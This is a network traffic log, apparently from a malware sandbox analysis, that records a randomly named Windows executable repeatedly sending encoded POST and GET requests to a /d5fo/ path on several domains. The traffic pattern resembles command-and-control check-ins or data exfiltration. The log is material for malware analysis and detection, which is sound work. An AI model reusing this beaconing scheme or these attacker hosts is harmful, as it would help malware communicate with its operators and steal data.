Jul 25, 2024 12:10:07.651846886 CEST	485	OUT	GET /d5fo/?7b7D=AHzm4ye+5PiW8EK3Xc8yvQbL0W8b+QDjDz3KJBw+soEJlA3iHdW1FHFMZKYf54FvxwKLR/ceGHi29plUOxZKTvSK+yeJiXyyL9T50uSOcXQBWH3FsDfUfLjchgLwvE1adw==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.primerpaintjobs.com Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:10:15.231710911 CEST	406	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 25 Jul 2024 10:10:15 GMT Content-Type: text/html Content-Length: 266 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 62 37 44 3d 41 48 7a 6d 34 79 65 2b 35 50 69 57 38 45 4b 33 58 63 38 79 76 51 62 4c 30 57 38 62 2b 51 44 6a 44 7a 33 4b 4a 42 77 2b 73 6f 45 4a 6c 41 33 69 48 64 57 31 46 48 46 4d 5a 4b 59 66 35 34 46 76 78 77 4b 4c 52 2f 63 65 47 48 69 32 39 70 6c 55 4f 78 5a 4b 54 76 53 4b 2b 79 65 4a 69 58 79 79 4c 39 54 35 30 75 53 4f 63 58 51 42 57 48 33 46 73 44 66 55 66 4c 6a 63 68 67 4c 77 76 45 31 61 64 77 3d 3d 26 6a 6c 78 3d 5a 64 34 38 53 42 46 30 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7b7D=AHzm4ye+5PiW8EK3Xc8yvQbL0W8b+QDjDz3KJBw+soEJlA3iHdW1FHFMZKYf54FvxwKLR/ceGHi29plUOxZKTvSK+yeJiXyyL9T50uSOcXQBWH3FsDfUfLjchgLwvE1adw==&jlx=Zd48SBF0d"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49751	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:20.318392038 CEST	744	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.gacorslot188.com Origin: http://www.gacorslot188.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.gacorslot188.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 56 69 6b 4d 6a 31 67 71 4f 66 6a 62 4c 68 45 4e 43 64 41 64 65 79 61 32 6a 57 61 53 7a 6f 65 62 59 77 55 65 35 63 33 74 43 6f 65 4e 66 4a 6c 4b 6f 78 4d 47 6f 4a 56 77 77 55 49 79 61 43 69 63 48 52 56 54 49 37 65 34 6d 78 48 51 7a 76 52 49 52 54 63 65 63 38 4b 49 4a 42 6a 6d 32 31 36 76 4c 68 4f 47 45 74 59 34 73 43 68 4b 48 72 58 57 50 45 2b 47 48 78 75 4a 6e 76 57 77 74 45 4c 4d 73 77 58 66 37 72 64 2b 43 6a 56 6c 33 79 55 46 47 55 66 57 6f 61 2b 52 41 75 72 56 69 63 37 55 37 5a 37 46 6c 77 59 6d 36 4a 42 73 78 2f 50 4d 37 44 72 6c 5a 45 43 34 6b 59 61 78 38 43 71 32 6e 34 51 30 4c 41 77 3d Data Ascii: 7b7D=VikMj1gqOfjbLhENCdAdeya2jWaSzoebYwUe5c3tCoeNfJlKoxMGoJVwwUIyaCicHRVTI7e4mxHQzvRIRTcec8KIJBjm216vLhOGEtY4sChKHrXWPE+GHxuJnvWwtELMswXf7rd+CjVl3yUFGUfWoa+RAurVic7U7Z7FlwYm6JBsx/PM7DrlZEC4kYax8Cq2n4Q0LAw=
Jul 25, 2024 12:10:20.957909107 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:10:20 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49752	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:22.854939938 CEST	764	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.gacorslot188.com Origin: http://www.gacorslot188.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.gacorslot188.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 56 69 6b 4d 6a 31 67 71 4f 66 6a 62 4c 41 55 4e 41 2b 59 64 57 79 61 31 2f 6d 61 53 6f 34 65 58 59 77 6f 65 35 5a 50 39 42 65 75 4e 66 73 4a 4b 70 77 4d 47 70 4a 56 77 2f 30 49 33 45 79 69 74 48 52 49 75 49 2f 61 34 6d 78 54 51 7a 75 68 49 53 67 30 66 4f 38 4b 4b 45 68 6a 6b 34 56 36 76 4c 68 4f 47 45 74 4d 53 73 43 35 4b 48 61 48 57 4f 6c 2b 48 4e 52 75 4f 33 2f 57 77 70 45 4c 49 73 77 57 38 37 71 78 55 43 68 39 6c 33 7a 6b 46 47 46 66 52 78 71 2b 58 4f 4f 71 78 76 64 4b 36 36 4c 48 70 36 57 5a 30 73 2f 41 55 39 70 69 6d 68 68 6a 4e 4b 6b 75 41 30 4c 53 47 74 79 4c 66 39 62 41 45 56 58 6e 42 2f 6d 63 61 4f 41 78 54 63 4a 38 6c 4d 38 5a 76 68 51 54 59 Data Ascii: 7b7D=VikMj1gqOfjbLAUNA+YdWya1/maSo4eXYwoe5ZP9BeuNfsJKpwMGpJVw/0I3EyitHRIuI/a4mxTQzuhISg0fO8KKEhjk4V6vLhOGEtMSsC5KHaHWOl+HNRuO3/WwpELIswW87qxUCh9l3zkFGFfRxq+XOOqxvdK66LHp6WZ0s/AU9pimhhjNKkuA0LSGtyLf9bAEVXnB/mcaOAxTcJ8lM8ZvhQTY
Jul 25, 2024 12:10:23.685215950 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:10:23 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49753	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:25.405455112 CEST	1781	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.gacorslot188.com Origin: http://www.gacorslot188.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.gacorslot188.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 56 69 6b 4d 6a 31 67 71 4f 66 6a 62 4c 41 55 4e 41 2b 59 64 57 79 61 31 2f 6d 61 53 6f 34 65 58 59 77 6f 65 35 5a 50 39 42 64 4f 4e 59 65 42 4b 6f 58 59 47 71 4a 56 77 32 55 49 32 45 79 69 4b 48 52 41 71 49 36 44 4e 6d 7a 72 51 38 74 70 49 47 42 30 66 55 73 4b 4b 4e 42 6a 6c 32 31 36 36 4c 67 2b 43 45 74 63 53 73 43 35 4b 48 59 76 57 4a 30 2b 48 65 42 75 4a 6e 76 57 38 74 45 4c 77 73 77 2f 48 37 71 45 6a 58 42 64 6c 75 54 30 46 41 33 48 52 35 71 2b 56 4e 4f 71 70 76 64 47 35 36 50 6e 4c 36 57 45 68 73 34 4d 55 2b 4f 62 4f 6c 7a 69 52 62 69 76 74 38 61 43 44 77 53 50 50 6a 49 30 50 66 6d 66 2b 78 6b 41 72 62 55 64 46 52 34 70 63 53 4d 68 48 70 30 6d 56 6c 46 7a 79 50 75 37 53 54 47 68 39 53 69 6c 39 6f 54 57 37 49 78 76 53 50 78 41 7a 63 2f 36 42 31 51 6c 6d 31 72 6d 67 51 45 6e 78 44 57 2b 31 5a 6d 56 51 48 53 31 2b 2f 38 54 64 66 41 42 5a 56 77 70 6b 58 2b 57 4a 4c 61 77 68 6d 4c 64 50 67 51 75 49 31 71 4e 30 7a 2b 75 31 4b 45 76 56 6c 73 4c 61 53 76 43 6e 58 4b 6f 69 6a 77 6b 36 58 [TRUNCATED] Data Ascii: 7b7D=VikMj1gqOfjbLAUNA+YdWya1/maSo4eXYwoe5ZP9BdONYeBKoXYGqJVw2UI2EyiKHRAqI6DNmzrQ8tpIGB0fUsKKNBjl2166Lg+CEtcSsC5KHYvWJ0+HeBuJnvW8tELwsw/H7qEjXBdluT0FA3HR5q+VNOqpvdG56PnL6WEhs4MU+ObOlziRbivt8aCDwSPPjI0Pfmf+xkArbUdFR4pcSMhHp0mVlFzyPu7STGh9Sil9oTW7IxvSPxAzc/6B1Qlm1rmgQEnxDW+1ZmVQHS1+/8TdfABZVwpkX+WJLawhmLdPgQuI1qN0z+u1KEvVlsLaSvCnXKoijwk6X+Ajm//HuxSkxYi+5L8oUVwugwo70VoEHfFYiolwa1Z9wWmm/vRxRka3krQNUG/OVrcA4hcpUjXduMBYhp6lqgvQzw49ecslbJ7uMujjko854RwzhjxuI5hjRu8BqCg4+HgUMTopZgqxcy9Z5GFMmpD2gALqDriQR4engDECo9j/Ktiw+I1DDgVnLIwiDL2XUPm8ARuGfym5j6SG4B1i13+o6H8TqsCK7hpEoAwEQ1O0+4apYZg0to3nSwbS0v5ZEYZ34bWthGuEbIUUPKNIkyQBhvZGipkqCskqnLXgbVRykvjQVpFJIf1ENnsOZJ7PuTpqzKIcZHepLQHa9RSQMTjfdgqppQ/I94/xvYXoxFfBUSw9TuEe+BewBuQvT6jbJKPsYPmh+i1ImFOkOwLK/9k3bsR+MogXarxfl/r8hT/V9qMQhYTH55F/Ix6+KXTB185nTQtzvr8w5by6Vp+Jm41F9SlR9puPs7lJaFTkxGvkP5uuERxny/KMsbz7Rv8Pv64kXL7eamtka/XlIu4WTM49FeacizN34E0rP2EmYWMWvhJyG0FQasOpvfqkNCZv+1SGxelme61tKzX6xSKHa756FiExrBUX3zuf5ZDMv8FQXg2vJHmEn81pTxVqq9Bxw2gvEtn14L9rgAm37IRKJ/pVecUxkzFD4fJ [TRUNCATED]
Jul 25, 2024 12:10:26.083298922 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:10:25 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49754	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:28.242881060 CEST	482	OUT	GET /d5fo/?7b7D=YgMsgDJtCOjfJyENf6IYVB+j8nyLj4HpaTgxuJv8edncauxSuygt96U33iQCFym5FChTcLDhuwePnMBbbjdGUumEJzbp4n/EDj2Sbs8WnSMUCI3AXWDzfQLO1NjL1mG45A==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.gacorslot188.com Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:10:28.886085033 CEST	113	IN	HTTP/1.1 439 date: Thu, 25 Jul 2024 10:10:28 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49755	104.21.25.75	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:34.084237099 CEST	723	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.fwbkl.com Origin: http://www.fwbkl.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.fwbkl.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 53 6c 50 45 49 64 2b 51 62 73 49 4f 4c 61 59 2f 61 32 6c 35 55 57 53 57 6b 46 53 4a 4b 64 56 4b 5a 48 53 52 75 62 6c 32 45 64 54 50 70 61 4f 79 52 2b 6b 77 4f 52 45 44 4e 45 39 6e 51 66 58 43 74 62 78 4e 36 5a 38 41 6f 4e 6a 6f 32 34 4c 6c 6e 31 6f 4e 56 50 59 67 6d 6e 4c 56 43 2b 2b 30 49 7a 38 6c 6c 52 2f 4d 47 30 46 42 6f 43 53 6f 54 30 45 4e 39 46 34 6a 45 5a 69 6d 73 46 4e 56 4f 4c 54 34 42 45 32 64 46 46 77 66 35 68 45 32 59 4b 52 45 32 48 56 55 4e 46 42 61 6d 49 76 71 38 59 4c 48 68 6c 53 72 37 51 4b 64 63 61 4f 34 6b 61 6c 49 7a 63 56 67 39 32 6a 68 65 75 5a 58 4e 7a 36 35 67 53 63 3d Data Ascii: 7b7D=SlPEId+QbsIOLaY/a2l5UWSWkFSJKdVKZHSRubl2EdTPpaOyR+kwOREDNE9nQfXCtbxN6Z8AoNjo24Lln1oNVPYgmnLVC++0Iz8llR/MG0FBoCSoT0EN9F4jEZimsFNVOLT4BE2dFFwf5hE2YKRE2HVUNFBamIvq8YLHhlSr7QKdcaO4kalIzcVg92jheuZXNz65gSc=
Jul 25, 2024 12:10:35.062896967 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 10:10:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private Vary: Accept-Encoding Set-Cookie: ASPSESSIONIDQARRRDQQ=HBPMJJNADDEABDAGNGLFAIJJ; path=/ X-Powered-By: ASP.NET CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uvfPXndClvqvyInrH6G6caxnBXP3qXdOpBb%2FOr3nTh%2FbKoJ3l00ljugwOqXOUYs3IO35X3%2BniCj9BYzwjZQq4bcdotvL9PC62jPz%2BqcqKPNf5QqsyRSw9yev96u%2FpTbx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8b5c65bc158cda-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 65 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b eb 73 da 58 96 ff 1c 57 f9 7f d0 b0 55 d3 55 33 26 c4 4e fa 31 0e 66 2a eb 99 da 9d aa e9 da a9 9a 99 aa d9 4f 5d 32 56 82 2a 18 58 90 f3 e8 dd fd 63 24 d1 36 71 94 84 97 00 21 61 c0 3c 0c 02 81 40 20 d2 ee 4e e2 74 32 71 d2 71 7a ba f3 58 7b 98 24 b5 75 24 64 fc 8a 93 4e b2 1f f0 b6 5d e8 9e 7b ef b9 e7 de 73 ee ef 9e fb 92 86 87 ac 3f fb cd bf 4d fe e9 df ff f0 5b c4 41 cc 38 6d c3 43 56 2d b4 3a 30 74 1a 62 33 18 81 22 0e 82 f0 98 b1 ff 98 c5 cf 4d 98 ec 6e 17 81 b9 08 33 71 d1 83 99 90 5e 6c c2 44 60 17 08 0b 14 3d 89 d8 1d a8 d7 87 11 13 67 a6 ce 9a b6 44 18 89 a6 5e ea 7e a2 ff 62 fe f3 29 f3 a4 7b c6 83 12 f8 94 73 bb f4 df fd 76 62 74 74 04 9e c7 e0 f9 2b 78 7c d2 17 ee 42 67 b0 09 d3 39 1c 3b ef 71 7b 89 6d e5 ce e3 d3 84 63 62 1a 3b 87 db 31 b3 16 19 41 70 17 4e e0 a8 d3 ec b3 a3 4e 6c 62 f4 e8 b1 11 64 d6 87 79 b5 38 3a e5 c4 26 8e 8d 20 33 b8 0b 9f 99 9d d9 ce 33 83 5e d8 99 64 da d7 3c 93 a8 dd 81 99 27 dd 2e c2 eb 76 6e 6b 89 cb 6d f6 [TRUNCATED] Data Ascii: e00[sXWUU3&N1fO]2VXc$6q!a<@ Nt2qqzX{$u$dN]{s?M[A8mCV-:0tb3"Mn3q^lD`=gD^~b){svbtt+x\|Bg9;q{mcb;1ApNNlbdy8:& 33^d<'.vnkmz<=pb;_@&+MiigwoT4[~\|YQ{XvUwxNubY0pa'Ly&\|>Q;,}wlb,[\G5.v
Jul 25, 2024 12:10:35.063438892 CEST	1236	IN	Data Raw: cf 5a 7c 06 9b c6 d1 09 13 ea 74 6a 3d 7e 60 85 a7 dd 2e 02 3d 8f f9 dc 33 d8 81 55 02 9f b9 c7 f8 ee b5 ce a0 b8 eb c0 ea 80 e1 8d aa d1 84 db 86 87 8e 7a d0 33 b8 0b 05 0c 21 ff 39 3c 74 c4 89 bb 30 b3 03 c3 cf 38 88 71 64 f4 63 cf 85 93 c3 43 Data Ascii: Z\|tj=~`.=3Uz3!9<t08qdcCAyZ8r02?rKBA~a?ZQvyq9QI?Nw5^%^=h5BeA\|n,n82vL&"F%O
Jul 25, 2024 12:10:35.064784050 CEST	1236	IN	Data Raw: 9d 3a 60 68 bc ab e0 41 1c 19 4d 9e a4 40 b7 dc 3d f6 ce 16 cc 01 ca 11 5a c9 d5 45 f5 4a f4 49 f0 39 49 95 bb c2 5f 21 94 c9 ec 0b 08 f9 c0 e2 23 92 52 a4 ea 33 92 0a de cf dd ab b3 59 99 a4 2a 57 53 25 7e fd ce 1a 49 25 6e 55 33 b9 7b 24 b5 b4 Data Ascii: :`hAM@=ZEJI9I_!#R3YWS%~I%nU3{$)I^zBRKTK\H\|c$fBBR:WWWIq)~6((}\|{B/d2\H*I)w1_fZ[gBp7T"J^OAI"P2cc]?gVaRb#
Jul 25, 2024 12:10:35.064795971 CEST	601	IN	Data Raw: af 2d 98 11 88 b4 5f 70 cb 5b 91 cc a3 ac 76 d9 8b 44 e8 fc b7 6d 59 6c c3 5e eb 15 50 7c 2f 92 07 75 1d 97 ab 8d c0 82 ad 17 84 bb 4d 56 5c 56 32 ad 18 9b 8f 5c 6b 3c 85 f8 88 d0 54 64 e9 31 77 9b 66 c2 7c 69 2d 44 0a 42 6b a5 fc 88 e6 9b 3c 50 Data Ascii: -_p[vDmYl^P\|/uMV\V2\k<Td1wf\|i-DBk<PJ3`N+K\rLk=AWK4{)^mbF6/.5Y6WYU6J94Hc&[Bxf=W:lFXHOiRj/JJA^!Q52
Jul 25, 2024 12:10:35.301089048 CEST	1236	IN	Data Raw: 35 31 61 0d 0a bc 5c 6d 4f db 56 14 fe 4c a5 fe 87 28 9a 04 7c 68 42 58 d9 22 d6 65 9b f6 69 5f fb 0f 1c 3b 76 e2 d8 4e 62 3b 24 b6 b4 1f 43 83 ba b4 a8 6a 4a 88 32 63 87 d7 cc 79 83 38 2f 34 30 2a ba 75 74 43 68 dd da 0e 36 ba 22 a1 c9 4e 80 00 Data Ascii: 51a\mOVL(\|hBX"ei_;vNb;$CjJ2cy8/40utCh6"NT"9tss=^M[ay]o1O{F'};gV8i=]SX3:F&wG"Yt}Nu$zKskt=M
Jul 25, 2024 12:10:35.301526070 CEST	97	IN	Data Raw: a4 1f 5a 17 c0 f1 00 ca 3b c6 1d 4e 1c c1 02 df 30 4e 87 db ad b4 d7 37 f5 d3 e9 aa 52 7b 25 57 6c 7c 27 1d 0d e5 1e 95 7f 1f be 79 e3 db e1 cf ce a1 dd 62 3f 00 5e df 6a dc 78 2d 10 c1 04 fd ad 80 7e 14 e7 7f 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 Data Ascii: Z;N0N7R{%Wl\|'yb?^jx-~a(S0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49756	104.21.25.75	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:10:36.636990070 CEST	743	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.fwbkl.com Origin: http://www.fwbkl.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.fwbkl.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 53 6c 50 45 49 64 2b 51 62 73 49 4f 4c 35 77 2f 5a 58 6c 35 46 47 53 58 72 6c 53 4a 44 39 56 4f 5a 48 65 52 75 66 56 6d 45 6f 6a 50 70 2f 79 79 51 2f 6b 77 41 78 45 44 46 6b 39 6d 55 66 58 63 74 63 35 6a 36 62 59 41 6f 4e 66 6f 32 34 62 6c 6d 47 77 4f 54 66 59 69 67 6e 4c 58 64 4f 2b 30 49 7a 38 6c 6c 51 61 45 47 30 64 42 76 78 61 6f 53 56 45 4b 31 6c 35 52 53 4a 69 6d 6f 46 4e 52 4f 4c 54 67 42 46 71 7a 46 48 49 66 35 68 30 32 59 62 52 48 38 48 55 66 4a 46 41 76 68 49 36 42 79 4f 53 50 6a 6b 76 2b 6f 68 50 6c 64 73 6a 53 2b 34 74 67 67 38 35 59 74 6c 72 57 50 65 34 2b 58 51 71 4a 2b 46 49 56 66 72 31 42 79 58 75 4c 73 64 49 66 5a 74 77 70 76 36 67 33 Data Ascii: 7b7D=SlPEId+QbsIOL5w/ZXl5FGSXrlSJD9VOZHeRufVmEojPp/yyQ/kwAxEDFk9mUfXctc5j6bYAoNfo24blmGwOTfYignLXdO+0Iz8llQaEG0dBvxaoSVEK1l5RSJimoFNROLTgBFqzFHIf5h02YbRH8HUfJFAvhI6ByOSPjkv+ohPldsjS+4tgg85YtlrWPe4+XQqJ+FIVfr1ByXuLsdIfZtwpv6g3
Jul 25, 2024 12:10:37.646517992 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 10:10:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private Vary: Accept-Encoding Set-Cookie: ASPSESSIONIDQARRRDQQ=OBPMJJNAEOMMOMGEEBDFAAFP; path=/ X-Powered-By: ASP.NET CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQLLsyEeJLjAhP4t07%2FkhFf9VLzSUVvVE5IImxxYfZl2AQpSREK%2FP9ZQce59BmMZqU5ol24Y39A%2BShjPUlbTMN1UQMn0tKXGchBlWfaqqaTOWYvySn2F8s694BeGkpgZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8b5c75dfea0f7d-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 65 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b eb 73 da 58 96 ff 1c 57 f9 7f d0 b0 55 d3 55 33 26 c4 4e fa 31 0e 66 2a eb 99 da 9d aa e9 da a9 9a 99 aa d9 4f 5d 32 56 82 2a 18 58 90 f3 e8 dd fd 63 24 d1 36 71 94 84 97 00 21 61 c0 3c 0c 02 81 40 20 d2 ee 4e e2 74 32 71 d2 71 7a ba f3 58 7b 98 24 b5 75 24 64 fc 8a 93 4e b2 1f f0 b6 5d e8 9e 7b ef b9 e7 de 73 ee ef 9e fb 92 86 87 ac 3f fb cd bf 4d fe e9 df ff f0 5b c4 41 cc 38 6d c3 43 56 2d b4 3a 30 74 1a 62 33 18 81 22 0e 82 f0 98 b1 ff 98 c5 cf 4d 98 ec 6e 17 81 b9 08 33 71 d1 83 99 90 5e 6c c2 44 60 17 08 0b 14 3d 89 d8 1d a8 d7 87 11 13 67 a6 ce 9a b6 44 18 89 a6 5e ea 7e a2 ff 62 fe f3 29 f3 a4 7b c6 83 12 f8 94 73 bb f4 df fd 76 62 74 74 04 9e c7 e0 f9 2b 78 7c d2 17 ee 42 67 b0 09 d3 39 1c 3b ef 71 7b 89 6d e5 ce e3 d3 84 63 62 1a 3b 87 db 31 b3 16 19 41 70 17 4e e0 a8 d3 ec b3 a3 4e 6c 62 f4 e8 b1 11 64 d6 87 79 b5 38 3a e5 c4 26 8e 8d 20 33 b8 0b 9f 99 9d d9 ce 33 83 5e d8 99 64 da d7 3c 93 a8 dd 81 99 27 dd 2e c2 eb 76 6e 6b 89 cb 6d f6 [TRUNCATED] Data Ascii: e00[sXWUU3&N1fO]2VXc$6q!a<@ Nt2qqzX{$u$dN]{s?M[A8mCV-:0tb3"Mn3q^lD`=gD^~b){svbtt+x\|Bg9;q{mcb;1ApNNlbdy8:& 